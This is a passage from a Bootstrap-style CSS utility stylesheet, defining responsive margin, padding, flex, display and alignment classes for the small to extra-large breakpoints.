    margin: 1rem !important;
  }

  .m-sm-4 {
    margin: 1.5rem !important;
  }

  .m-sm-5 {
    margin: 3rem !important;
  }

  .m-sm-auto {
    margin: auto !important;
  }

  .mx-sm-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-sm-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-sm-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-sm-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-sm-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-sm-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-sm-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-sm-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-sm-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-sm-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-sm-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-sm-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-sm-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-sm-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-sm-0 {
    margin-top: 0 !important;
  }

  .mt-sm-1 {
    margin-top: 0.25rem !important;
  }

  .mt-sm-2 {
    margin-top: 0.5rem !important;
  }

  .mt-sm-3 {
    margin-top: 1rem !important;
  }

  .mt-sm-4 {
    margin-top: 1.5rem !important;
  }

  .mt-sm-5 {
    margin-top: 3rem !important;
  }

  .mt-sm-auto {
    margin-top: auto !important;
  }

  .me-sm-0 {
    margin-right: 0 !important;
  }

  .me-sm-1 {
    margin-right: 0.25rem !important;
  }

  .me-sm-2 {
    margin-right: 0.5rem !important;
  }

  .me-sm-3 {
    margin-right: 1rem !important;
  }

  .me-sm-4 {
    margin-right: 1.5rem !important;
  }

  .me-sm-5 {
    margin-right: 3rem !important;
  }

  .me-sm-auto {
    margin-right: auto !important;
  }

  .mb-sm-0 {
    margin-bottom: 0 !important;
  }

  .mb-sm-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-sm-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-sm-3 {
    margin-bottom: 1rem !important;
  }

  .mb-sm-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-sm-5 {
    margin-bottom: 3rem !important;
  }

  .mb-sm-auto {
    margin-bottom: auto !important;
  }

  .ms-sm-0 {
    margin-left: 0 !important;
  }

  .ms-sm-1 {
    margin-left: 0.25rem !important;
  }

  .ms-sm-2 {
    margin-left: 0.5rem !important;
  }

  .ms-sm-3 {
    margin-left: 1rem !important;
  }

  .ms-sm-4 {
    margin-left: 1.5rem !important;
  }

  .ms-sm-5 {
    margin-left: 3rem !important;
  }

  .ms-sm-auto {
    margin-left: auto !important;
  }

  .p-sm-0 {
    padding: 0 !important;
  }

  .p-sm-1 {
    padding: 0.25rem !important;
  }

  .p-sm-2 {
    padding: 0.5rem !important;
  }

  .p-sm-3 {
    padding: 1rem !important;
  }

  .p-sm-4 {
    padding: 1.5rem !important;
  }

  .p-sm-5 {
    padding: 3rem !important;
  }

  .px-sm-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-sm-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-sm-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-sm-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-sm-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-sm-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-sm-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-sm-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-sm-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-sm-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-sm-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-sm-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-sm-0 {
    padding-top: 0 !important;
  }

  .pt-sm-1 {
    padding-top: 0.25rem !important;
  }

  .pt-sm-2 {
    padding-top: 0.5rem !important;
  }

  .pt-sm-3 {
    padding-top: 1rem !important;
  }

  .pt-sm-4 {
    padding-top: 1.5rem !important;
  }

  .pt-sm-5 {
    padding-top: 3rem !important;
  }

  .pe-sm-0 {
    padding-right: 0 !important;
  }

  .pe-sm-1 {
    padding-right: 0.25rem !important;
  }

  .pe-sm-2 {
    padding-right: 0.5rem !important;
  }

  .pe-sm-3 {
    padding-right: 1rem !important;
  }

  .pe-sm-4 {
    padding-right: 1.5rem !important;
  }

  .pe-sm-5 {
    padding-right: 3rem !important;
  }

  .pb-sm-0 {
    padding-bottom: 0 !important;
  }

  .pb-sm-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-sm-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-sm-3 {
    padding-bottom: 1rem !important;
  }

  .pb-sm-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-sm-5 {
    padding-bottom: 3rem !important;
  }

  .ps-sm-0 {
    padding-left: 0 !important;
  }

  .ps-sm-1 {
    padding-left: 0.25rem !important;
  }

  .ps-sm-2 {
    padding-left: 0.5rem !important;
  }

  .ps-sm-3 {
    padding-left: 1rem !important;
  }

  .ps-sm-4 {
    padding-left: 1.5rem !important;
  }

  .ps-sm-5 {
    padding-left: 3rem !important;
  }

  .text-sm-start {
    text-align: left !important;
  }

  .text-sm-end {
    text-align: right !important;
  }

  .text-sm-center {
    text-align: center !important;
  }
}
@media (min-width: 768px) {
  .float-md-start {
    float: left !important;
  }

  .float-md-end {
    float: right !important;
  }

  .float-md-none {
    float: none !important;
  }

  .d-md-inline {
    display: inline !important;
  }

  .d-md-inline-block {
    display: inline-block !important;
  }

  .d-md-block {
    display: block !important;
  }

  .d-md-grid {
    display: grid !important;
  }

  .d-md-table {
    display: table !important;
  }

  .d-md-table-row {
    display: table-row !important;
  }

  .d-md-table-cell {
    display: table-cell !important;
  }

  .d-md-flex {
    display: flex !important;
  }

  .d-md-inline-flex {
    display: inline-flex !important;
  }

  .d-md-none {
    display: none !important;
  }

  .flex-md-fill {
    flex: 1 1 auto !important;
  }

  .flex-md-row {
    flex-direction: row !important;
  }

  .flex-md-column {
    flex-direction: column !important;
  }

  .flex-md-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-md-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-md-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-md-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-md-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-md-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-md-wrap {
    flex-wrap: wrap !important;
  }

  .flex-md-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-md-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-md-0 {
    gap: 0 !important;
  }

  .gap-md-1 {
    gap: 0.25rem !important;
  }

  .gap-md-2 {
    gap: 0.5rem !important;
  }

  .gap-md-3 {
    gap: 1rem !important;
  }

  .gap-md-4 {
    gap: 1.5rem !important;
  }

  .gap-md-5 {
    gap: 3rem !important;
  }

  .justify-content-md-start {
    justify-content: flex-start !important;
  }

  .justify-content-md-end {
    justify-content: flex-end !important;
  }

  .justify-content-md-center {
    justify-content: center !important;
  }

  .justify-content-md-between {
    justify-content: space-between !important;
  }

  .justify-content-md-around {
    justify-content: space-around !important;
  }

  .justify-content-md-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-md-start {
    align-items: flex-start !important;
  }

  .align-items-md-end {
    align-items: flex-end !important;
  }

  .align-items-md-center {
    align-items: center !important;
  }

  .align-items-md-baseline {
    align-items: baseline !important;
  }

  .align-items-md-stretch {
    align-items: stretch !important;
  }

  .align-content-md-start {
    align-content: flex-start !important;
  }

  .align-content-md-end {
    align-content: flex-end !important;
  }

  .align-content-md-center {
    align-content: center !important;
  }

  .align-content-md-between {
    align-content: space-between !important;
  }

  .align-content-md-around {
    align-content: space-around !important;
  }

  .align-content-md-stretch {
    align-content: stretch !important;
  }

  .align-self-md-auto {
    align-self: auto !important;
  }

  .align-self-md-start {
    align-self: flex-start !important;
  }

  .align-self-md-end {
    align-self: flex-end !important;
  }

  .align-self-md-center {
    align-self: center !important;
  }

  .align-self-md-baseline {
    align-self: baseline !important;
  }

  .align-self-md-stretch {
    align-self: stretch !important;
  }

  .order-md-first {
    order: -1 !important;
  }

  .order-md-0 {
    order: 0 !important;
  }

  .order-md-1 {
    order: 1 !important;
  }

  .order-md-2 {
    order: 2 !important;
  }

  .order-md-3 {
    order: 3 !important;
  }

  .order-md-4 {
    order: 4 !important;
  }

  .order-md-5 {
    order: 5 !important;
  }

  .order-md-last {
    order: 6 !important;
  }

  .m-md-0 {
    margin: 0 !important;
  }

  .m-md-1 {
    margin: 0.25rem !important;
  }

  .m-md-2 {
    margin: 0.5rem !important;
  }

  .m-md-3 {
    margin: 1rem !important;
  }

  .m-md-4 {
    margin: 1.5rem !important;
  }

  .m-md-5 {
    margin: 3rem !important;
  }

  .m-md-auto {
    margin: auto !important;
  }

  .mx-md-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-md-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-md-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-md-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-md-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-md-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-md-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-md-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-md-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-md-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-md-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-md-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-md-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-md-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-md-0 {
    margin-top: 0 !important;
  }

  .mt-md-1 {
    margin-top: 0.25rem !important;
  }

  .mt-md-2 {
    margin-top: 0.5rem !important;
  }

  .mt-md-3 {
    margin-top: 1rem !important;
  }

  .mt-md-4 {
    margin-top: 1.5rem !important;
  }

  .mt-md-5 {
    margin-top: 3rem !important;
  }

  .mt-md-auto {
    margin-top: auto !important;
  }

  .me-md-0 {
    margin-right: 0 !important;
  }

  .me-md-1 {
    margin-right: 0.25rem !important;
  }

  .me-md-2 {
    margin-right: 0.5rem !important;
  }

  .me-md-3 {
    margin-right: 1rem !important;
  }

  .me-md-4 {
    margin-right: 1.5rem !important;
  }

  .me-md-5 {
    margin-right: 3rem !important;
  }

  .me-md-auto {
    margin-right: auto !important;
  }

  .mb-md-0 {
    margin-bottom: 0 !important;
  }

  .mb-md-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-md-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-md-3 {
    margin-bottom: 1rem !important;
  }

  .mb-md-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-md-5 {
    margin-bottom: 3rem !important;
  }

  .mb-md-auto {
    margin-bottom: auto !important;
  }

  .ms-md-0 {
    margin-left: 0 !important;
  }

  .ms-md-1 {
    margin-left: 0.25rem !important;
  }

  .ms-md-2 {
    margin-left: 0.5rem !important;
  }

  .ms-md-3 {
    margin-left: 1rem !important;
  }

  .ms-md-4 {
    margin-left: 1.5rem !important;
  }

  .ms-md-5 {
    margin-left: 3rem !important;
  }

  .ms-md-auto {
    margin-left: auto !important;
  }

  .p-md-0 {
    padding: 0 !important;
  }

  .p-md-1 {
    padding: 0.25rem !important;
  }

  .p-md-2 {
    padding: 0.5rem !important;
  }

  .p-md-3 {
    padding: 1rem !important;
  }

  .p-md-4 {
    padding: 1.5rem !important;
  }

  .p-md-5 {
    padding: 3rem !important;
  }

  .px-md-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-md-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-md-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-md-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-md-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-md-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-md-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-md-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-md-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-md-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-md-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-md-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-md-0 {
    padding-top: 0 !important;
  }

  .pt-md-1 {
    padding-top: 0.25rem !important;
  }

  .pt-md-2 {
    padding-top: 0.5rem !important;
  }

  .pt-md-3 {
    padding-top: 1rem !important;
  }

  .pt-md-4 {
    padding-top: 1.5rem !important;
  }

  .pt-md-5 {
    padding-top: 3rem !important;
  }

  .pe-md-0 {
    padding-right: 0 !important;
  }

  .pe-md-1 {
    padding-right: 0.25rem !important;
  }

  .pe-md-2 {
    padding-right: 0.5rem !important;
  }

  .pe-md-3 {
    padding-right: 1rem !important;
  }

  .pe-md-4 {
    padding-right: 1.5rem !important;
  }

  .pe-md-5 {
    padding-right: 3rem !important;
  }

  .pb-md-0 {
    padding-bottom: 0 !important;
  }

  .pb-md-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-md-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-md-3 {
    padding-bottom: 1rem !important;
  }

  .pb-md-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-md-5 {
    padding-bottom: 3rem !important;
  }

  .ps-md-0 {
    padding-left: 0 !important;
  }

  .ps-md-1 {
    padding-left: 0.25rem !important;
  }

  .ps-md-2 {
    padding-left: 0.5rem !important;
  }

  .ps-md-3 {
    padding-left: 1rem !important;
  }

  .ps-md-4 {
    padding-left: 1.5rem !important;
  }

  .ps-md-5 {
    padding-left: 3rem !important;
  }

  .text-md-start {
    text-align: left !important;
  }

  .text-md-end {
    text-align: right !important;
  }

  .text-md-center {
    text-align: center !important;
  }
}
@media (min-width: 992px) {
  .float-lg-start {
    float: left !important;
  }

  .float-lg-end {
    float: right !important;
  }

  .float-lg-none {
    float: none !important;
  }

  .d-lg-inline {
    display: inline !important;
  }

  .d-lg-inline-block {
    display: inline-block !important;
  }

  .d-lg-block {
    display: block !important;
  }

  .d-lg-grid {
    display: grid !important;
  }

  .d-lg-table {
    display: table !important;
  }

  .d-lg-table-row {
    display: table-row !important;
  }

  .d-lg-table-cell {
    display: table-cell !important;
  }

  .d-lg-flex {
    display: flex !important;
  }

  .d-lg-inline-flex {
    display: inline-flex !important;
  }

  .d-lg-none {
    display: none !important;
  }

  .flex-lg-fill {
    flex: 1 1 auto !important;
  }

  .flex-lg-row {
    flex-direction: row !important;
  }

  .flex-lg-column {
    flex-direction: column !important;
  }

  .flex-lg-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-lg-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-lg-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-lg-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-lg-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-lg-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-lg-wrap {
    flex-wrap: wrap !important;
  }

  .flex-lg-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-lg-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-lg-0 {
    gap: 0 !important;
  }

  .gap-lg-1 {
    gap: 0.25rem !important;
  }

  .gap-lg-2 {
    gap: 0.5rem !important;
  }

  .gap-lg-3 {
    gap: 1rem !important;
  }

  .gap-lg-4 {
    gap: 1.5rem !important;
  }

  .gap-lg-5 {
    gap: 3rem !important;
  }

  .justify-content-lg-start {
    justify-content: flex-start !important;
  }

  .justify-content-lg-end {
    justify-content: flex-end !important;
  }

  .justify-content-lg-center {
    justify-content: center !important;
  }

  .justify-content-lg-between {
    justify-content: space-between !important;
  }

  .justify-content-lg-around {
    justify-content: space-around !important;
  }

  .justify-content-lg-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-lg-start {
    align-items: flex-start !important;
  }

  .align-items-lg-end {
    align-items: flex-end !important;
  }

  .align-items-lg-center {
    align-items: center !important;
  }

  .align-items-lg-baseline {
    align-items: baseline !important;
  }

  .align-items-lg-stretch {
    align-items: stretch !important;
  }

  .align-content-lg-start {
    align-content: flex-start !important;
  }

  .align-content-lg-end {
    align-content: flex-end !important;
  }

  .align-content-lg-center {
    align-content: center !important;
  }

  .align-content-lg-between {
    align-content: space-between !important;
  }

  .align-content-lg-around {
    align-content: space-around !important;
  }

  .align-content-lg-stretch {
    align-content: stretch !important;
  }

  .align-self-lg-auto {
    align-self: auto !important;
  }

  .align-self-lg-start {
    align-self: flex-start !important;
  }

  .align-self-lg-end {
    align-self: flex-end !important;
  }

  .align-self-lg-center {
    align-self: center !important;
  }

  .align-self-lg-baseline {
    align-self: baseline !important;
  }

  .align-self-lg-stretch {
    align-self: stretch !important;
  }

  .order-lg-first {
    order: -1 !important;
  }

  .order-lg-0 {
    order: 0 !important;
  }

  .order-lg-1 {
    order: 1 !important;
  }

  .order-lg-2 {
    order: 2 !important;
  }

  .order-lg-3 {
    order: 3 !important;
  }

  .order-lg-4 {
    order: 4 !important;
  }

  .order-lg-5 {
    order: 5 !important;
  }

  .order-lg-last {
    order: 6 !important;
  }

  .m-lg-0 {
    margin: 0 !important;
  }

  .m-lg-1 {
    margin: 0.25rem !important;
  }

  .m-lg-2 {
    margin: 0.5rem !important;
  }

  .m-lg-3 {
    margin: 1rem !important;
  }

  .m-lg-4 {
    margin: 1.5rem !important;
  }

  .m-lg-5 {
    margin: 3rem !important;
  }

  .m-lg-auto {
    margin: auto !important;
  }

  .mx-lg-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-lg-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-lg-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-lg-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-lg-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-lg-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-lg-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-lg-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-lg-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-lg-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-lg-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-lg-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-lg-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-lg-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-lg-0 {
    margin-top: 0 !important;
  }

  .mt-lg-1 {
    margin-top: 0.25rem !important;
  }

  .mt-lg-2 {
    margin-top: 0.5rem !important;
  }

  .mt-lg-3 {
    margin-top: 1rem !important;
  }

  .mt-lg-4 {
    margin-top: 1.5rem !important;
  }

  .mt-lg-5 {
    margin-top: 3rem !important;
  }

  .mt-lg-auto {
    margin-top: auto !important;
  }

  .me-lg-0 {
    margin-right: 0 !important;
  }

  .me-lg-1 {
    margin-right: 0.25rem !important;
  }

  .me-lg-2 {
    margin-right: 0.5rem !important;
  }

  .me-lg-3 {
    margin-right: 1rem !important;
  }

  .me-lg-4 {
    margin-right: 1.5rem !important;
  }

  .me-lg-5 {
    margin-right: 3rem !important;
  }

  .me-lg-auto {
    margin-right: auto !important;
  }

  .mb-lg-0 {
    margin-bottom: 0 !important;
  }

  .mb-lg-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-lg-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-lg-3 {
    margin-bottom: 1rem !important;
  }

  .mb-lg-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-lg-5 {
    margin-bottom: 3rem !important;
  }

  .mb-lg-auto {
    margin-bottom: auto !important;
  }

  .ms-lg-0 {
    margin-left: 0 !important;
  }

  .ms-lg-1 {
    margin-left: 0.25rem !important;
  }

  .ms-lg-2 {
    margin-left: 0.5rem !important;
  }

  .ms-lg-3 {
    margin-left: 1rem !important;
  }

  .ms-lg-4 {
    margin-left: 1.5rem !important;
  }

  .ms-lg-5 {
    margin-left: 3rem !important;
  }

  .ms-lg-auto {
    margin-left: auto !important;
  }

  .p-lg-0 {
    padding: 0 !important;
  }

  .p-lg-1 {
    padding: 0.25rem !important;
  }

  .p-lg-2 {
    padding: 0.5rem !important;
  }

  .p-lg-3 {
    padding: 1rem !important;
  }

  .p-lg-4 {
    padding: 1.5rem !important;
  }

  .p-lg-5 {
    padding: 3rem !important;
  }

  .px-lg-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-lg-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-lg-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-lg-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-lg-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-lg-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-lg-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-lg-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-lg-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-lg-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-lg-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-lg-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-lg-0 {
    padding-top: 0 !important;
  }

  .pt-lg-1 {
    padding-top: 0.25rem !important;
  }

  .pt-lg-2 {
    padding-top: 0.5rem !important;
  }

  .pt-lg-3 {
    padding-top: 1rem !important;
  }

  .pt-lg-4 {
    padding-top: 1.5rem !important;
  }

  .pt-lg-5 {
    padding-top: 3rem !important;
  }

  .pe-lg-0 {
    padding-right: 0 !important;
  }

  .pe-lg-1 {
    padding-right: 0.25rem !important;
  }

  .pe-lg-2 {
    padding-right: 0.5rem !important;
  }

  .pe-lg-3 {
    padding-right: 1rem !important;
  }

  .pe-lg-4 {
    padding-right: 1.5rem !important;
  }

  .pe-lg-5 {
    padding-right: 3rem !important;
  }

  .pb-lg-0 {
    padding-bottom: 0 !important;
  }

  .pb-lg-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-lg-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-lg-3 {
    padding-bottom: 1rem !important;
  }

  .pb-lg-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-lg-5 {
    padding-bottom: 3rem !important;
  }

  .ps-lg-0 {
    padding-left: 0 !important;
  }

  .ps-lg-1 {
    padding-left: 0.25rem !important;
  }

  .ps-lg-2 {
    padding-left: 0.5rem !important;
  }

  .ps-lg-3 {
    padding-left: 1rem !important;
  }

  .ps-lg-4 {
    padding-left: 1.5rem !important;
  }

  .ps-lg-5 {
    padding-left: 3rem !important;
  }

  .text-lg-start {
    text-align: left !important;
  }

  .text-lg-end {
    text-align: right !important;
  }

  .text-lg-center {
    text-align: center !important;
  }
}
@media (min-width: 1200px) {
  .float-xl-start {
    float: left !important;
  }

  .float-xl-end {
    float: right !important;
  }

  .float-xl-none {
    float: none !important;
  }

  .d-xl-inline {
    display: inline !important;
  }

  .d-xl-inline-block {
    display: inline-block !important;
  }

  .d-xl-block {
    display: block !important;
  }

  .d-xl-grid {
    display: grid !important;
  }

  .d-xl-table {
    display: table !important;
  }

  .d-xl-table-row {
    display: table-row !important;
  }

  .d-xl-table-cell {
    display: table-cell !important;
  }

  .d-xl-flex {
    display: flex !important;
  }

  .d-xl-inline-flex {
    display: inline-flex !important;
  }

  .d-xl-none {
    display: none !important;
  }

  .flex-xl-fill {
    flex: 1 1 auto !important;
  }

  .flex-xl-row {
    flex-direction: row !important;
  }

  .flex-xl-column {
    flex-direction: column !important;
  }

  .flex-xl-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-xl-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-xl-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-xl-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-xl-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-xl-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-xl-wrap {
    flex-wrap: wrap !important;
  }

  .flex-xl-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-xl-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-xl-0 {
    gap: 0 !important;
  }

  .gap-xl-1 {
    gap: 0.25rem !important;
  }

  .gap-xl-2 {
    gap: 0.5rem !important;
  }

  .gap-xl-3 {
    gap: 1rem !important;
  }

  .gap-xl-4 {
    gap: 1.5rem !important;
  }

  .gap-xl-5 {
    gap: 3rem !important;
  }

  .justify-content-xl-start {
    justify-content: flex-start !important;
  }

  .justify-content-xl-end {
    justify-content: flex-end !important;
  }

  .justify-content-xl-center {
    justify-content: center !important;
  }

  .justify-content-xl-between {
    justify-content: space-between !important;
  }

  .justify-content-xl-around {
    justify-content: space-around !important;
  }

  .justify-content-xl-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-xl-start {
    align-items: flex-start !important;
  }

  .align-items-xl-end {
    align-items: flex-end !important;
  }

  .align-items-xl-center {
    align-items: center !important;
  }

  .align-items-xl-baseline {
    align-items: baseline !important;
  }

  .align-items-xl-stretch {
    align-items: stretch !important;
  }

  .align-content-xl-start {
    align-content: flex-start !important;
  }

  .align-content-xl-end {
    align-content: flex-end !important;
  }

  .align-content-xl-center {
    align-content: center !important;
  }

  .align-content-xl-between {
    align-content: space-between !important;
  }

  .align-content-xl-around {
    align-content: space-around !important;
  }

  .align-content-xl-stretch {
    align-content: stretch !important;
  }

  .align-self-xl-auto {
    align-self: auto !important;
  }

  .align-self-xl-start {
    align-self: flex-start !important;
  }

  .align-self-xl-end {
    align-self: flex-end !important;
  }

  .align-self-xl-center {
    align-self: center !important;
  }

  .align-self-xl-baseline {
    align-self: baseline !important;
  }

  .align-self-xl-stretch {
    align-self: stretch !important;
  }

  .order-xl-first {
    order: -1 !important;
  }

  .order-xl-0 {
    order: 0 !important;
  }

  .order-xl-1 {
    order: 1 !important;
  }

  .order-xl-2 {
    order: 2 !important;
  }

  .order-xl-3 {
    order: 3 !important;
  }

  .order-xl-4 {
    order: 4 !important;
  }

  .order-xl-5 {
    order: 5 !important;
  }

  .order-xl-last {
    order: 6 !important;
  }

  .m-xl-0 {
    margin: 0 !important;
  }

  .m-xl-1 {
    margin: 0.25rem !important;
  }

  .m-xl-2 {
    margin: 0.5rem !important;
  }

  .m-xl-3 {
    margin: 1rem !important;
  }

  .m-xl-4 {
    margin: 1.5rem !important;
  }

  .m-xl-5 {
    margin: 3rem !important;
  }

  .m-xl-auto {
    margin: auto !important;
  }

  .mx-xl-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-xl-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-xl-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-xl-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-xl-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-xl-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-xl-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-xl-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-xl-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-xl-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-xl-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-xl-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-xl-5 {
